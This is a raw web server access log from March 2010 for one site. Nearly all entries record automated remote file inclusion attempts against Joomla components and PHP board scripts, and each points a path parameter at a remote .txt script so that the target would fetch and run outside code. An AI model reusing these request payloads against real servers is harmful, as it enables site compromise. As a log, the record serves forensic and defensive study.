78.46.87.243 - - [04/Mar/2010:09:38:48 -0800] "GET /logs/access_100226.log//index.php?option=com_poll&Itemid=&mosConfig.absolute.path=http://demo.njipn.com//idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:09:38:48 -0800] "GET /index.php?option=com_poll&Itemid=&mosConfig.absolute.path=http://demo.njipn.com//idlab1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:09:40:29 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:09:40:29 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:09:40:29 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:09:40:29 -0800] "GET /logs/access_100208.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [04/Mar/2010:09:41:19 -0800] "GET /logs/access_100219.log/view.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.3.8.2 - - [04/Mar/2010:09:41:23 -0800] "GET //vwar/backup/errors.php?error=http://www.bayrakstudio.com/images/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.3.8.2 - - [04/Mar/2010:09:41:23 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.bayrakstudio.com/images/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.3.8.2 - - [04/Mar/2010:09:41:35 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.bayrakstudio.com/images/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:09:42:20 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:09:42:20 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:09:42:20 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:09:42:20 -0800] "GET /logs/access_100208.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:43:22 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:43:22 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:43:22 -0800] "GET /logs/access_100220.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:43:27 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:43:27 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:43:28 -0800] "GET /logs/access_100220.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:43:47 -0800] "GET /logs/access_100220.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:43:48 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:43:48 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.77.228.201 - - [04/Mar/2010:09:44:00 -0800] "GET /logs/access_100128.log//write_update.php?board_skin_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.77.228.201 - - [04/Mar/2010:09:44:00 -0800] "GET /write_update.php?board_skin_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.77.228.201 - - [04/Mar/2010:09:44:00 -0800] "GET /logs//write_update.php?board_skin_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:44:16 -0800] "GET /logs/access_100220.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:44:21 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:44:21 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.77.228.201 - - [04/Mar/2010:09:44:24 -0800] "GET /logs/access_100220.log//write_update.php?board_skin_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.77.228.201 - - [04/Mar/2010:09:44:39 -0800] "GET /logs/access_100128.log//write_update.php?board_skin_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.77.228.201 - - [04/Mar/2010:09:44:39 -0800] "GET /logs//write_update.php?board_skin_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.77.228.201 - - [04/Mar/2010:09:44:39 -0800] "GET /write_update.php?board_skin_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [04/Mar/2010:09:44:49 -0800] "GET /logs/access_100214.log%20%20//error.php?dir=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [04/Mar/2010:09:44:49 -0800] "GET /logs//error.php?dir=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [04/Mar/2010:09:44:49 -0800] "GET /error.php?dir=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.77.228.201 - - [04/Mar/2010:09:44:54 -0800] "GET /logs/access_100220.log//write_update.php?board_skin_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [04/Mar/2010:09:45:00 -0800] "GET /logs/access_091130.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.112.232 - - [04/Mar/2010:09:45:01 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://www.puaga.com/logs/access_091130.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.112.232 - - [04/Mar/2010:09:45:01 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://www.puaga.com/logs/access_091130.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
72.55.148.208 - - [04/Mar/2010:09:45:16 -0800] "GET /logs//error.php?dir=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [04/Mar/2010:09:45:16 -0800] "GET /error.php?dir=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [04/Mar/2010:09:45:16 -0800] "GET /logs/access_100214.log%20%20//error.php?dir=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [04/Mar/2010:09:46:34 -0800] "GET /logs/access_100205.log%20%20//error.php?dir=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [04/Mar/2010:09:46:55 -0800] "GET /logs/access_100205.log%20%20//error.php?dir=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:47:17 -0800] "GET /logs//kboard.php?board=free&act=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:47:18 -0800] "GET /kboard.php?board=free&act=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:47:18 -0800] "GET /logs/access_100214.log%20%20//kboard.php?board=free&act=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:47:28 -0800] "GET /logs//kboard.php?board=free&act=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:47:28 -0800] "GET /kboard.php?board=free&act=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:47:28 -0800] "GET /logs/access_100214.log//kboard.php?board=free&act=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:47:34 -0800] "GET /logs/access_100214.log//kboard.php?board=free&act=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:47:34 -0800] "GET /logs//kboard.php?board=free&act=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:47:34 -0800] "GET /kboard.php?board=free&act=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:47:38 -0800] "GET /logs/access_100221.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:47:39 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:47:39 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:48:22 -0800] "GET /logs/access_100221.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:48:26 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:48:31 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:48:41 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:48:41 -0800] "GET /logs/access_100130.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:48:46 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:48:55 -0800] "GET /logs//kboard.php?board=free&act=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:48:55 -0800] "GET /kboard.php?board=free&act=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:49:07 -0800] "GET /logs/access_100220.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:49:15 -0800] "GET /logs/access_100225.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:49:33 -0800] "GET /logs/access_100226.log%20%20//kboard.php?board=free&act=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.162.116.235 - - [04/Mar/2010:09:50:08 -0800] "GET /logs/access_100130.log%20%20/?board_skin_path=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.162.116.235 - - [04/Mar/2010:09:50:08 -0800] "GET /logs/?board_skin_path=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:50:08 -0800] "GET /logs/access_100126.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/pir1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:50:08 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/pir1.txt? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
69.162.116.235 - - [04/Mar/2010:09:50:09 -0800] "GET /?board_skin_path=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:50:09 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/pir1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.162.116.235 - - [04/Mar/2010:09:50:36 -0800] "GET /logs/access_100206.log%20%20/?board_skin_path=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.96.156.84 - - [04/Mar/2010:09:50:39 -0800] "GET /artmedic-kleinanzeigen-path/index.php?id=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.96.156.84 - - [04/Mar/2010:09:50:39 -0800] "GET /logs/artmedic-kleinanzeigen-path/index.php?id=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.96.156.84 - - [04/Mar/2010:09:50:39 -0800] "GET /logs/access_100128.log/artmedic-kleinanzeigen-path/index.php?id=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:50:52 -0800] "GET /logs/access_100226.log//kboard.php?board=free&act=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:51:08 -0800] "GET /logs/access_100226.log//kboard.php?board=free&act=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:09:51:10 -0800] "GET /logs/access_100208.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:51:11 -0800] "GET /logs/access_100226.log//kboard.php?board=free&act=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:09:51:21 -0800] "GET /logs/access_100215.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:51:30 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:51:30 -0800] "GET /logs/access_100220.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:51:33 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [04/Mar/2010:09:51:39 -0800] "GET /logs/access_100219.log//modules/vwar/admin/admin.php?vwar_root=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [04/Mar/2010:09:51:40 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [04/Mar/2010:09:51:40 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:51:51 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:51:55 -0800] "GET /logs/access_100126.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/pir1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:51:55 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/pir1.txt? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:51:55 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/pir1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:51:56 -0800] "GET /logs/access_100214.log%20%20//kboard.php?board=free&act=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:51:57 -0800] "GET /kboard.php?board=free&act=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:51:57 -0800] "GET /logs//kboard.php?board=free&act=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:51:58 -0800] "GET /logs/access_100220.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:52:02 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:52:10 -0800] "GET /logs/access_100225.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:52:25 -0800] "GET /delete_comment.php?board_skin_path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:52:25 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:52:25 -0800] "GET /logs/access_100214.log//delete_comment.php?board_skin_path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:52:27 -0800] "GET /logs/access_100214.log//delete_comment.php?board_skin_path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:52:27 -0800] "GET /delete_comment.php?board_skin_path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:52:27 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:52:47 -0800] "GET /logs/access_100225.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:52:49 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:52:53 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:52:54 -0800] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:52:54 -0800] "GET /logs/access.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:52:54 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:52:55 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:52:56 -0800] "GET /logs/access_100225.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:52:58 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:09:53:07 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
